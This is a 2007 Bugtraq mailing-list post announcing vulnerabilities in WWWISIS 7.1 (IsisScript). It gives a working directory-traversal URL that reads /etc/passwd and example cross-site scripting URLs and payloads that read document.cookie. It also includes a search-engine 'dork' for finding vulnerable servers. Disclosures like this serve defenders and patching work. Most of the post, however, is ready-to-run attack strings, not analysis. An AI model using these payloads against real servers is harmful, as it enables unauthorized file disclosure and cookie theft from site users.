Bugtraq mailing list archives
WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities
From: jose luis góngora fernández <sys-project () hotmail com>
Date: Tue, 16 Oct 2007 16:23:57 +0000
# WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities # Download: # http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 # Bug found by JosS / Jose Luis Góngora Fernández # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: powered by WWWISIS # Stop lammer # Local File Disclosure Vulnerability: http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd # Exploit In (XSS): http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e .... [ i,e ... ] it is the language of script # Cross Siting Scripting: <script>alert(document.cookie)</script> "><script>alert(document.cookie)</script> //---------------------------------------\\ Greetz To: All Hackers JosS! / Jose Luis Góngora Fernández _________________________________________________________________Horóscopo, tarot, numerología... Escucha lo que te dicen los astros. http://astrocentro.msn.es/
Current thread:
- WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities jose luis góngora fernández (Oct 16)